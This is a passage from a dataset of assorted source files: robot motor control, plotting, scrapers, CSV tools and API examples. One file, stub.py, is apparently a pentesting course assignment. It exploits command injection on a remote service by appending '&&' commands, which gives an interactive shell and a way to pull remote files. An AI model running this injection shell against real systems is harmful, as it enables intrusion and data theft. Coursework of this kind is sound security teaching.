l[j]\n prev = l[j]\n i, j = i+1, j-1\n\n if i == j:\n if prev:\n prev.next = l[i]\n l[i].next = None\n else:\n if prev:\n prev.next = None\n return head\n\nsol = Solution()\nfor i in range(6):\n sol.addNode(i)\nsol.printList(sol.list)\nsol.reorderList(sol.list)\nsol.printList(sol.list)\n","sub_path":"leetcode/python-sol/143.Reorder_List.py","file_name":"143.Reorder_List.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"170021687","text":"from utils import log_util\nfrom utils.rabbitmq_channel import PubSubRMQ\n\nlogger = log_util.get_module_logger(__name__)\n\n\nclass RabbitMQStaggingService(PubSubRMQ):\n\n def callback(self, ch, method, properties, body):\n if method.routing_key != '':\n logger.info(\" [RabbitMQStaggingService] %r:%r\" % (method.routing_key, body))\n else:\n logger.info(\" [RabbitMQStaggingService] just consumed: %r\" % body)\n","sub_path":"dockers/flask/rabbitmq/services/rabbitmq_service.py","file_name":"rabbitmq_service.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"489614471","text":"import turtle\r\n\r\nwn = turtle.Screen()\r\nwn.bgcolor(\"black\")\r\nalex = turtle.Turtle()\r\nalex.color(\"yellow\")\r\nsam = turtle.Turtle()\r\nsam.color(\"red\")\r\ntiny = turtle.Turtle()\r\ntiny.color(\"green\")\r\nx = 100\r\n\r\nfor t_ in [alex, sam, tiny]:\r\n x+=20\r\n t_.goto(x,x)\r\n t_.forward(100)\r\n\r\n#for i in range(0, 10, 2):\r\n # print(i)\r\n\r\nwn.exitonclick()\r\n","sub_path":"week02/class_code/for_loops/forLoopTurtles-1.py","file_name":"forLoopTurtles-1.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"68455168","text":"# -*- coding: utf-8 -*-\n\n\nimport csv\n\n\ndef readCSV():\n with open('./reuters_csv2009/reuters_topNews_2009_completion2.csv', 'r') as f:\n # rowData = csv.reader(f)\n data = []\n rowData = csv.reader(f)\n for row in rowData:\n data.append(row)\n return data\n\n\ndef separeteText(data):\n pos = [[\"head\", \"pubdate\", \"eventdate\", \"text\", \"posneg\"]]\n non = [[\"head\", \"pubdate\", \"eventdate\", \"text\", \"posneg\"]]\n neg = [[\"head\", \"pubdate\", \"eventdate\", \"text\", \"posneg\"]]\n\n for row in data:\n # print(row)\n if(row[4] == \"1\"):\n pos.append(row)\n elif(row[4] == \"0\"):\n non.append(row)\n elif(row[4] == \"-1\"):\n neg.append(row)\n\n writeCSV(pos, \"pos\")\n writeCSV(non, \"non\")\n writeCSV(neg, \"neg\")\n\n\ndef writeCSV(data_posneg, string_posneg):\n with open(\"./reuters_csv2009/\"+string_posneg+\".csv\", \"w\") as f:\n writer = csv.writer(f, lineterminator='\\n')\n writer.writerows(data_posneg)\n\n\nif __name__ == '__main__':\n data = readCSV()\n # for row in data:\n # print(row)\n # print(data)\n separeteText(data)\n","sub_path":"separate_texts.py","file_name":"separate_texts.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571677540","text":"#!/usr/bin/env python\nimport rospy\nimport time\nimport random\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\nclass drunkturtle():\n\n\tdef __init__(self):\n\t\trospy.init_node('drunkturtle_enebriator', anonymous=True)\n\t\tself.vel_publisher = rospy.Publisher('/turtle1/cmd_vel',Twist, queue_size=5)\n\t\tself.rate = rospy.Rate(5)\n\n\tdef sendVel(self,vx,omega):\n\t\tvel_msg = Twist()\n\t\tvel_msg.linear.x = vx\n\t\tvel_msg.angular.z = omega\n\t\tself.vel_publisher.publish(vel_msg)\n\n\tdef stumbleForward(self,vx):\n\t\tomega = random.randint(-10,10)\n\t\tomega = float(omega)/5\n\t\tself.sendVel(vx,omega)\n\nif __name__ =='__main__':\n\tdrunkAF = drunkturtle()\n\tvel_msg = Twist()\n\tvel_msg.linear.x = 1\n\ttimenow = time.time()\n\twhile(time.time()-timenow < 15):\n\t\tdrunkAF.stumbleForward(0.5)\n\t\tdrunkAF.rate.sleep()\n","sub_path":"catkin_ws/src/drunk_turtle.py","file_name":"drunk_turtle.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"36503556","text":"#!/usr/bin/env python\n# coding=utf-8\n\nfrom os import name\nimport xlwt\n\nimport base\nfrom config.schema import Subscriber\nimport util.database\n\n\nclass DownloadSubscribeHandler(base.BaseHandler):\n def get(self):\n self.check()\n session = util.database.Session()\n \n \n \n workbook = xlwt.Workbook(encoding = 'utf-8')\n result = workbook.add_sheet('result_sheet')\n file_name = \"subscribe_list.xls\"\n date_style = xlwt.easyxf(num_format_str='YYYY-MM-DD') \n result.write(0, 1, '姓名')\n result.write(0, 2, '邮箱')\n result.write(0, 3, '公司')\n result.write(0, 4, '登记日期')\n\n subscribelist = session.query(Subscriber).order_by(Subscriber.date).all()\n for rowid, subscribe in enumerate(subscribelist):\n \n result.write(rowid + 1, 1 , subscribe.name)\n result.write(rowid + 1, 2 , subscribe.email) \n result.write(rowid + 1, 3, subscribe.company)\n result.write(rowid + 1, 4 , subscribe.date, date_style) \n workbook.save(\"static/download/\" + file_name)\n \n session.close() \n\n if name =='nt':\n mode = 'rb'\n else:\n mode = 'r'\n\n buf_size = 4096\n self.set_header('Content-Type', 'application/octet-stream')\n self.set_header('Content-Disposition', 'attachment; filename = subscribe_list.xls')\n with open(\"static/download/\" + file_name, mode) as f:\n while True:\n data = f.read(buf_size)\n if not data:\n break\n self.write(data)\n self.finish()\n\n def post(self):\n self.check()\n self.redirect(\"/admin/manage\")\n\n","sub_path":"src/handlers/admin/downloadsubscribe.py","file_name":"downloadsubscribe.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"206308707","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 26 19:02:33 2017\n\n@author: q\n\"\"\"\n\n# 导入模块\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n# 导入数据\ndata = pd.read_excel('C:\\\\Users\\\\Administrator\\\\Desktop\\\\货运.xls')\n\n# 绘图\nplt.bar(np.arange(8), data.loc[0,:][1:], \n color = 'red', alpha = 0.8, label = '铁路', align = 'center')\nplt.bar(np.arange(8), data.loc[1,:][1:], bottom = data.loc[0,:][1:], \n color = 'green', alpha = 0.8, label = '公路', align = 'center')\nplt.bar(np.arange(8), data.loc[2,:][1:], bottom = data.loc[0,:][1:]+data.loc[1,:][1:], \n color = 'm', alpha = 0.8, label = '水运', align = 'center')\nplt.bar(np.arange(8), data.loc[3,:][1:], bottom = data.loc[0,:][1:]+data.loc[1,:][1:]+data.loc[2,:][1:], \n color = 'black', alpha = 0.8, label = '民航', align = 'center')\n# 添加轴标签\nplt.xlabel('月份')\nplt.ylabel('货物量(万吨)')\n# 添加标题\nplt.title('2017年各月份物流运输量')\n# 添加刻度标签\nplt.xticks(np.arange(8),data.columns[1:])\n# 设置Y轴的刻度范围\nplt.ylim([0,500000])\n\n# 为每个条形图添加数值标签\nfor x_t,y_t in enumerate(data.loc[0,:][1:]):\n plt.text(x_t,y_t/2,'%sW' %(round(y_t/10000,2)),ha='center', color = 'white')\n\nfor x_g,y_g in enumerate(data.loc[0,:][1:]+data.loc[1,:][1:]):\n plt.text(x_g,y_g/2,'%sW' %(round(y_g/10000,2)),ha='center', color = 'white') \n\nfor x_s,y_s in enumerate(data.loc[0,:][1:]+data.loc[1,:][1:]+data.loc[2,:][1:]):\n plt.text(x_s,y_s-20000,'%sW' %(round(y_s/10000,2)),ha='center', color = 'white') \n\n# 显示图例\nplt.legend(loc='upper center', ncol=4)\n# 显示图形 \nplt.show()","sub_path":"plotstackbar.py","file_name":"plotstackbar.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"92668401","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nExample code to call Rosette API to determine the language of a piece of text.\n\"\"\"\n\nimport argparse\nimport pprint\n\nfrom rosette.api import API, DocumentParameters\n\nparser = argparse.ArgumentParser(description=\"Determine the language of a piece of text\")\nparser.add_argument(\"--key\", required=True, help=\"Rosette API key\")\nparser.add_argument(\"--service_url\", nargs=\"?\", help=\"Optional user service URL\")\nargs = parser.parse_args()\n\n# Create an API instance\nif args.service_url:\n api = API(service_url=args.service_url, user_key=args.key)\nelse:\n api = API(user_key=args.key)\n\nparams = DocumentParameters()\n\n# Use an HTML file to load data instead of a string\nparams[\"content\"] = u\"Por favor Señorita, says the man.\"\nresult = api.language(params)\n\npprint.pprint(result)\n","sub_path":"examples/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"592155900","text":"\"\"\"\n Author: Erin Schick\n Use the same techniques such as (but not limited to):\n 1) Sockets\n 2) File I/O\n 3) raw_input()\n\n from the OSINT HW to complete this assignment. Good luck!\n\"\"\"\n\nimport socket\nimport sys\nimport os.path\n\nhost = \"1337bank.money\" # IP address here: 142.93.136.81\nport = 1337 # Port here\ncurrent_dir = \"hello\"\n\ndef execute_cmd(cmd):\n global current_dir\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n\n data = s.recv(1024)\n\n if current_dir.split()[0] == \"cd\":\n s.send(host + \" && \" + current_dir + cmd + \"\\n\")\n else:\n s.send(host + \" && \" + cmd + \"\\n\")\n\n if cmd.split()[0] == \"cd\":\n current_dir = cmd + \"&&\"\n\n data = s.recv(1024)\n data2 = s.recv(1024)\n print(data2)\n return data2\n\n\nif __name__ == '__main__':\n print(\"Welcome to 1337bank.money's\")\n\n while True:\n print(\">\")\n command = raw_input()\n\n if command == \"shell\":\n while True:\n print(\"$$$$$$>\")\n response = raw_input()\n\n if response == \"quit\":\n break;\n else:\n execute_cmd(response)\n\n elif command.split()[0] == \"pull\":\n str = execute_cmd(\"cat \" + command.split()[1])\n local_path = command.split()[2] + \"/result.txt\"\n file1 = open(\"result.txt\", \"w\")\n file1.write(str)\n file1.close()\n\n os.rename(\"result.txt\", local_path)\n\n elif command == \"help\":\n print(\"Welcome to the help menu!\")\n print(\"Commands you can enter include: shell, pull, help , and quit\")\n\n elif command == \"quit\":\n sys.exit()\n\n else:\n print(\"Your command was incorrect, please insert one of these instead: shell, pull, help , and quit\")\n","sub_path":"assignments/4_Pentesting_I/writeup/stub.py","file_name":"stub.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"119556249","text":"#coding: utf-8\n# 時間制御を行うライブラリ\nimport time\n# 自作関数をインポートするためのライブラリ\nimport sys\n# 並列処理���必要な関数\nfrom multiprocessing import Manager, Process\n# シリアル通信に必要な関数\nimport serial\n# データ整形に必要\nimport ast\n\nimport termios\n\nimport os\n\n\n\n\n# 自作関数のインポート\nsys.path.append(\"/kaiyo/my_mod\")\n# ArduinoMegaとシリアル通信してセンサデータをもらう関数\nfrom my_get_serial import get_data, send_data\n# PCA9685と通信しモータを制御する関数\nfrom my_motor import go_back, up_down, spinturn, roll, stop, stop_go_back, stop_up_down, go_back_each, up_down_each, spinturn_each\n# 主にロボットの姿勢制御(方向、深度)を行う関数\nfrom my_balance import go_yaw, roteto, go_depth\n# プロポ(t19j)を使って、ロボットを制御するための関数\nfrom my_rc import t10j, t10j_time, t10j_mode_sumo\n# プログラムスタート時にロボットの状態や初期設定の動作を行う関数\nfrom my_check import operation_check, battery_check, my_exit, first_action\n# 7色LEDの制御を行う関数\nfrom my_gpio import led_red, led_green, led_yellow, led_off, led_blue, led_purple, led_lihtblue\n# 大会コースに沿った動作を行う関数。(主にこの関数の値を調整して大会挑んだ)\n# from my_course import course_convention, course_pool\n# プログラムがエラーを発生したときにエラーの内容をテキストファイルに記録する関数\nfrom my_text_write import error_log_write\n# GPSデータの取得や、GPSデータをテキストファイルに保存する関数\nfrom my_gps import gps_sensor_join_data\n# GPSによるウェイポイント制御を行う関数\n# from my_waypoint import waypoint, pad_rc_route_data_creation\n# 水中ロボット班から借りたゲームパッドでラジコン制御するとに使う関数\nfrom my_gamepad import pad_rc\n# from my_move_puropo import move_puropo\nfrom my_move_test import move_test\n# from my_camera2 import camera\nfrom my_camera4 import cap_main\nfrom my_data_sampling import data_sampling\nfrom threading import Thread\n# import readchar\ntry:\n # windows用なければ、似たようなの作る\n from msvcrt import getch\nexcept ImportError:\n def getch():\n import sys\n import tty\n import termios\n fd = sys.stdin.fileno()\n old = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n return sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old)\n\n\n# ArduinoMEGAとpinで接続---------\n# ArduinoMEGAとpinで接続\n# ser = serial.Serial('/dev/ttyS0', 115200, timeout=3)\n# ArduinoMEGAとUSBケーブル接続\nser = serial.Serial('/dev/ttyACM0', 115200, timeout=3)\n# ArduinoMEGAとpinで接続---------\n\npuropo_log_make = 0 #1:ログ読み込み 0:ログ書き込み\n\n# この関数にメインのプログラムを記述する------------------------------------------\n\n# サーミスタの値は温度ではなく抵抗値です。\n# 目安として「4.5」ぐらいが50度なので注意が必要でしょう。\n\n# この関数にメインのプログラムを記述する\n\n\n\ndef input_key(m_val,old_rot):\n try:\n # 直前の入力ログを消去\n os.remove('/kaiyo/log/input_log/just_before_read_input_log.txt')\n except FileNotFoundError:\n pass\n\n CTRL_C = 3\n while True:\n key = ord(getch())\n # 終了\n if key == CTRL_C:\n stop()\n old_rot = move_test(data, 'p', 0, goal_yaw, yaw_MV, goal_depth, depth_MV, set_yaw, set_depth,\n old_rot, True)\n print(\"main終了 Crtl+C押して\")\n break\n else:\n kb = format(chr(key))\n print(\"test_key\", kb)\n # ログ再現\n if kb == 'S':\n send_data(\"reset rot\")\n time.sleep(1)\n print(\"どのログを再生する? 9:大会時 0:直前\")\n key = ord(getch())\n kb = format(chr(key))\n print(\"test_key\", kb)\n old_rot = move_test(data, kb, m_val, goal_yaw, yaw_MV, goal_depth, depth_MV, set_yaw, set_depth,\n old_rot, False)\n\n # モータ出力------------------------\n elif kb == 'k': #モータ出力の低下\n if m_val > 0:\n m_val = m_val - 5;\n print(m_val)\n\n elif kb == 'l': #モータ出力の上昇\n if m_val <= 60:\n m_val = m_val + 5;\n print(m_val)\n # モータ出力------------------------\n\n else:\n # print(\"1\",old_rot)\n old_rot = move_test(data, kb, m_val, goal_yaw, yaw_MV, goal_depth, depth_MV, set_yaw, set_depth,\n old_rot, True)\n # print(\"2\",old_rot)\n kb = None\n time.sleep(0.2)\n\n\ndef my_main(spin_cnt):\n\n # go_back(15)\n # print (data, \"\\n\")\n # print (data[\"compass\"])\n\n # # go_depth確認用-------------------------------\n # print(\"time:\", data[\"time\"], \"depth:\", data[\"depth\"])\n # print(\"depth_MV :\", depth_MV.value, \"\\n\")\n # up_down(depth_MV.value)\n #\n #\n # # go_depth確認用-------------------------------\n # #\n # # go_back(60)\n # # up_down(13)\n # if set_depth.value == True:\n # up_down(depth_MV.value)\n # #\n # # print(data[\"time\"], data[\"depth\"])\n # # # go_yaw確認用-------------------------------\n\n # # print(data[\"time\"], data[\"yaw\"])\n # # print(\"yaw_MV :\", yaw_MV.value, \"\\n\")\n # # spinturn(yaw_MV.value)\n\n # if set_yaw.value == True:\n # if ( yaw_MV.value >= 0 ):\n # go_back_each(\n # m_val + yaw_MV.value,\n # m_val - yaw_MV.value,\n # m_val + yaw_MV.value,\n # m_val - yaw_MV.value)\n # elif ( yaw_MV.value < 0 ):\n # go_back_each(\n # m_val + yaw_MV.value,\n # m_val - yaw_MV.value,\n # m_val + yaw_MV.value,\n # m_val - yaw_MV.value)\n # # go_yaw確認用-------------------------------\n #\n # ave_rot = ((data[\"rot0\"] + data[\"rot1\"]) / 2) - spin_cnt\n # print(\"\\nrot\", ave_rot)\n # print(ave_rot % 100.0)\n #\n # if (ave_rot % 100.0 <= 5.0 and data[\"time\"] >= 10):\n # ave_rot_now = ave_rot\n # # print(\"test\")\n # goal_yaw.value = goal_yaw.value + 180\n # if(goal_yaw.value >= 360):\n # goal_yaw = 0\n #\n # print(\"goal_yaw\", goal_yaw.value)\n # print(\"spin\")\n # yaw_MV.value = yaw_MV.value\n # spinturn(yaw_MV.value)\n # time.sleep(5)\n # while True:\n # yaw_MV.value = yaw_MV.value\n # print(\"spin now\")\n # spinturn(yaw_MV.value)\n # if (-3.0 <= yaw_MV.value <= 3.0):\n # spin_cnt = ((data[\"rot0\"] + data[\"rot1\"]) / 2) - ave_rot_now\n # print(\"spin_cnt:\", spin_cnt)\n # break\n # time.sleep(0.2)\n\n\n time.sleep(0.2)\n pass\n\n# この関数にメインのプログラムを記述する------------------------------------------\n\n\nif __name__ == '__main__':\n try:\n print(\"wait:reboot now\")\n # send_data(\"puropo_on\")\n # send_data(\"puropo_off\")\n while True:\n try:\n print(\"send:reboot\")\n send_data(\"reboot\")\n # time.sleep(1)\n val = ser.readline()\n # print(val)\n val = ast.literal_eval(val.decode('unicode-escape'))\n if val[\"time\"] <= 10.0:\n # time.sleep(1)\n break\n\n except SyntaxError:\n print(\"main : Reception Error!!\\n\")\n except TimeoutError:\n print(\"main : timeout Error!\\n\")\n # except ValueError:\n # print(\"serial : Value Error!\\n\")\n\n\n\n # 出力\n m_val = 30\n old_rot = [0] * 6\n spin_cnt = 0\n\n with Manager() as manager:\n print(\"OK\")\n #センサーのdata\n data = manager.dict()\n #yawの操作量\n yaw_MV = manager.Value(\"d\", 0.0)\n #depthの操作量\n depth_MV = manager.Value(\"d\", 0.0)\n # goal_yawの目標値\n goal_yaw = manager.Value(\"i\", 0)\n # goal_depthの目標値\n goal_depth = manager.Value('d', 1.00)\n # yawをメインで実行\n set_yaw = manager.Value('i', False)\n # depthをメインで実行\n set_depth = manager.Value('i', False)\n # 受信データの大きさ\n try:\n val = ser.readline()\n val = ast.literal_eval(val.decode('unicode-escape'))\n except SyntaxError:\n # 受信エラー\n print(\"main : Reception Error!!\")\n\n # 受信データの大きさに合わせる\n for i in val:\n data[i] = val[i]\n\n # 各プロセスの定義\n get_data = Process(target=get_data, args=[data])\n # get_puropo = Process(target=move_puropo, args=[data, yaw_MV, puropo_log_make])\n go_yaw = Process(target=go_yaw, args=[goal_yaw, data, yaw_MV])\n go_depth = Process(target=go_depth, args=[goal_depth, data, depth_MV])\n sensor_log = Process(target=data_sampling, args=[data, 0.2]) # 0.2はsample_rate\n # f_camera = Process(target=cap_main, args=[])\n # キーボード入力、ソケット通信なしだと単体でしか動かない(mainから実行不可)\n # move_test = Process(target=move_test, args=[data, True])\n Thread_key = Thread(target=input_key, args=[m_val,old_rot])\n\n\n\n\n get_data.start()\n # get_puropo.start()\n go_yaw.start()\n go_depth.start()\n sensor_log.start()\n # f_camera.start()\n Thread_key.start()\n\n\n # モードなどの設定 2019使ってない\n # first_action(data)\n\n # ave_rot = 0\n\n print(\"start\")\n\n while True:\n # 予期せぬエラーが発生した時の処理\n try:\n # Ctrl-cを押したときの処理\n try:\n # メインのプログラム\n # ----------------------------------------\n my_main(spin_cnt)\n # my_exit()\n # break\n # ----------------------------------------\n except KeyboardInterrupt as e:\n # Ctrl-cを押したときの処理\n print(\"\\n-----------\")\n print(\"main.py : \", e)\n print(\"-----------\\n\")\n my_exit()\n except Exception as e:\n # 予期せぬエラーが発生した時の処理\n stop()\n # エラーの内容を残す(日付ごと)\n error_log_write(e)\n print(\"\\n-----------\")\n print(\"\\nmain.py Error :\", e)\n print(\"Error!!!!!!!!!!!!!!!!!!!!!!!\")\n print(\"-----------\\n\")\n for i in range(20):\n led_green()\n time.sleep(0.05)\n led_off()\n time.sleep(0.05)\n # my_exit()\n\n # get_data.join()\n # get_puropo.join()\n # go_yaw.join()\n # go_depth.join()\n\n except KeyboardInterrupt as key:\n # プログラムを終了するときの処理\n print(\"\\n-----------\")\n print(\"main.py : \", key)\n print(\"-----------\\n\")\n my_exit()\n","sub_path":"kaiyo/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"234551433","text":"import sys\nimport traceback\n\nimport selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom . import program\n\n\ndef execute(url, file_name, reverse_chronological, headless, scroll_pause_time, user_driver, cookie_consent):\n\n\n\n def process_url():\n channel_info = url.split('youtube.com/')[1]\n channel_type = channel_info.split('/')[0]\n channel = channel_info.split('/')[1]\n base_url = 'https://www.youtube.com'\n videos = 'videos'\n return f'{base_url}/{channel_type}/{channel}/{videos}'\n\n def open_user_driver():\n nonlocal user_driver\n supported_drivers = {\n 'firefox': configure_firefoxdriver,\n 'opera': configure_operadriver,\n 'chrome': configure_chromedriver,\n 'brave': configure_bravedriver,\n }\n return supported_drivers[user_driver]()\n\n def configure_firefoxdriver():\n options = selenium.webdriver.firefox.options.Options()\n if headless is True:\n options.headless = True\n return webdriver.Firefox(options=options)\n\n def configure_operadriver():\n options = webdriver.ChromeOptions()\n if headless is True:\n options.add_argument('headless')\n return webdriver.Opera(options=options)\n\n\n def configure_chromedriver():\n options = webdriver.ChromeOptions()\n if headless is True:\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-setuid-sandbox\")\n options.add_argument(\"--disable-dev-shm-using\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"start-maximized\")\n options.add_argument(\"disable-infobars\")\n options.add_argument(\"--headless\")\n return webdriver.Chrome(chrome_options=options)\n\n def configure_bravedriver():\n options = webdriver.ChromeOptions()\n options.binary_location = '/Applications/Brave Browser.app/Contents/MacOS/Brave Browser'\n executable_path = '/usr/local/bin/bravedriver'\n return webdriver.Chrome(options=options, executable_path=executable_path)\n\n\n\n def run_scraper():\n with driver:\n driver.get(url)\n driver.set_window_size(780, 800)\n driver.set_window_position(0, 0)\n manage_cookie_consent_form()\n wait = selenium.webdriver.support.ui.WebDriverWait(driver, 9)\n wait.until(EC.element_to_be_clickable(\n (By.XPATH, '//yt-formatted-string[@class=\"style-scope ytd-channel-name\"]')))\n\n file_name = determine_file_name()\n results = program.determine_action(\n url, driver, scroll_pause_time, reverse_chronological, file_name)\n return results\n\n def manage_cookie_consent_form():\n if 'consent.youtube.com' in driver.current_url:\n if cookie_consent is False:\n wait = selenium.webdriver.support.ui.WebDriverWait(driver, 9)\n wait.until(EC.element_to_be_clickable(\n (By.XPATH, '//a[@aria-label=\"Customize\"]')))\n driver.find_element_by_xpath(\n '//a[@aria-label=\"Customize\"]').click()\n wait.until(EC.element_to_be_clickable(\n (By.XPATH, '//button[@aria-label=\"Turn off Ad personalization\"]')))\n driver.find_element_by_xpath(\n '//button[@aria-label=\"Turn off Search customization\"]').click()\n driver.find_element_by_xpath(\n '//button[@aria-label=\"Turn off YouTube History\"]').click()\n driver.find_element_by_xpath(\n '//button[@aria-label=\"Turn off Ad personalization\"]').click()\n wait.until(EC.element_to_be_clickable(\n (By.XPATH, '//button[@aria-label=\"Ad personalization is off\"]')))\n driver.find_elements_by_xpath('//button')[-1].click()\n elif cookie_consent is True:\n driver.find_element_by_xpath(\n '//button[@aria-label=\"Agree to the use of cookies and other data for the purposes described\"]').click()\n\n\n def determine_file_name():\n if file_name is not None:\n return file_name.strip('.csv').strip('.txt').strip('.md')\n else:\n channel_name = driver.find_element_by_xpath(\n '//yt-formatted-string[@class=\"style-scope ytd-channel-name\"]').text.replace(' ', '')\n suffix = 'reverse_chronological_videos_list' if reverse_chronological else 'chronological_videos_list'\n return f'{channel_name}_{suffix}'\n\n\n url = process_url()\n driver = open_user_driver()\n return run_scraper()\n","sub_path":"get_channel/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"440803843","text":"import simplify\nimport quadratic\nimport Print\n# Factorisation - Difference between 2 squares\n\ntitle = 'Quadratics - The Quadratic Formula '\n\n# Prompting user for the number of review set\nset_number = int(input('\\nWhich set of exercise is this?'))\n\n# Prompting user for today's date\ndate = input(\"\\nWhat is today's date? (day month year)\")\n\n# Prompting user if all numbers of questions in each section are the same:\nidentical = 'N'\nidentical = input('\\nWould you like all sections to have the same number of questions? (Y/N)')\nif identical == 'Y' or identical == 'y' or identical == 'yes':\n number_of_questions = int(input('\\nHow many questions in each section? '))\n\n # Quadratic Formula - simple\n quadratic_output = quadratic.quadraticFormula(number_of_questions)\n\n## # Difference in 2 Squares - with common factors\n## dif2sq_comfac_output = FactorisationGenerator.dif2sq_comfac(number_of_questions)\n\n# Prompting user for number of questions in each section:\nelif identical == 'N' or identical == 'n' or identical == 'no':\n # Quadratic Formula\n print('\\n\\nQuadratic Formula:')\n print('Presentation:\\n Columns: 3\\n Questions per page: 18')\n\n number_of_questions = int(input('\\nNumber of Questions: '))\n quadratic_output = quadratic.quadraticFormula(number_of_questions)\n\n## # Difference in 2 Squares - with common factors\n## print('\\n\\nDifference in 2 Squares - with common factors:')\n## print('Presentation:\\n Columns: 3\\n Questions per page: 18')\n##\n## number_of_questions = int(input('\\nNumber of Questions: '))\n## dif2sq_comfac_output = FactorisationGenerator.dif2sq_comfac(number_of_questions)\n\nelse:\n print('\\nInvalid input.')\n quit()\n\n\n# Preparing output and descriptions\noutput = []\ndescription = []\n\n# Difference in 2 Squares\ndescription.append('\\n\\n\\\\item Solve for $x$ using the quadratic formula:\\n\\n \\\\begin{center} \\n $x = \\\\frac{-b \\\\pm \\\\sqrt{b^2-4ac}}{2a}$ \\n \\\\end{center}')\noutput.append(quadratic_output)\n\n### Difference in 2 Squares - with common factors\n##description.append('\\n\\n\\\\item First take out the HCF and then factorise using the algebraic fact that $(a+b)(a-b)=a^2-b^2$.')\n##output.append(dif2sq_comfac_output)\n\nfile = open(\"quadraticFormula.txt\",\"w\")\nPrint.doc_format(title,set_number,date,output,description,file)\nfile.close()\n\nprint('\\n\\n\\nText file have been produced. Please copy and paste onto LaTeX and compile.')\nprint(\"\\nThank you for using WhyTi's review set maker :)\")\n\nany_key = input('\\n\\n\\nPress any key to exit.')\nquit()\n","sub_path":"Algebra/Quadratics/Quadratics - Quadratic Formula.py","file_name":"Quadratics - Quadratic Formula.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433428689","text":"#!/usr/bin/python\n\nfrom matplotlib import pyplot as pl\nimport numpy as np\nfrom math import e\n\n# Define Constants\n\n#Nb = 35000. / 400 * 9 # Monomers / big molecule\nNs = 1000. / 400 * 9 # Monomers / small molecule\nk = 8.617*10**(-5) # (eV)/(K) 1.380*10**(-23) J/K\nT = 300. # Kelvin\nalpha = 0.49\nchi = 0.50\n\n##Define mu_inside and mu_outside as their own fncs of phi_s_outside\n#def mso(so):\n# return (1. - so)+ (5./4)*alpha*(so)**(9./4) - (9./4)*(alpha*(so)**(5./4) - chi*(1 - so)**2)\n#def msi(so):\n# return (1. - (1. - so)) + (5./4)*alpha*(1 - so)**(9./4) - (9./4)*(alpha*(1. - so)**(5./4) - chi*(1. - (1. - so))**2)\n#def chem_pot(so,f):\n#\treturn e**((f) - so + (1 - so) - (mso(so) + msi(so))*Ns) \n\n\n\n# define partition_coefficent= exp[-(delta mu_s-delta f)/kT] ----> exp[ (1/kT)*(delta f - (phi_s_out-phi_s_in + mu_bar_s_in-mu_bar_s_out)*Ns)] -----> exp[ (1/kT)*(delta f - (so-(1-so) + msi(so)-mso(so))*Ns)]\n# JCH don't forget to put (1./(k*T))* back in, gave \"overflow encountered in power\"error\ndef part_coeff(so,f):\n return e**(((f) - so + (1. - so) - (((1. - (1. - so)) + (5./4)*alpha*(1. - so)**(9./4) - (9./4)*(alpha*(1. - so)**(5./4) - chi*(1. - (1. - so))**2)) - ((1. - so)+ (5./4)*alpha*(so)**(9./4) - (9./4)*(alpha*(so)**(5./4) - chi*(1. - so)**2)))*Ns))\n\n\npl.figure()\n\nphiso = np.linspace(0.00, 0.99, num=500)\npl.plot(phiso, (part_coeff(phiso, -0.90)),'b--', label=' delta f = -0.90')\npl.plot(phiso, (part_coeff(phiso, -0.30)),'g--', label=' delta f = -0.30')\npl.plot(phiso, (part_coeff(phiso, 0.0)),'r--', label=' delta f = 0.0')\n#pl.plot(phiso, (part_coeff(phiso, (1 - phiso)/(0.01 + phiso))),'r--', label=' delta f = p')\npl.plot(phiso, (part_coeff(phiso, phiso)),'r--', label=' delta f = phiso')\npl.plot(phiso, (part_coeff(phiso, 0.30)),'b--,', label=' delta f = 0.30')\npl.plot(phiso, (part_coeff(phiso, 0.90)),'g--,', label=' delta f = 0.90')\n#pl.plot(phiso, (part_coeffXS(1. - phiso, 0.90)),'g--,', label=' delta f = 0.90')\n\n\npl.legend(loc='lower right')\npl.xlabel('Number Fraction Polymers Outside Pore')\npl.ylabel('Partition Coefficent ($/phi/$in/$/phi/$out)')\npl.title('Partition Coefficent vs Number Fraction Outside Pore')\npl.axis([0., 1.0, 0., 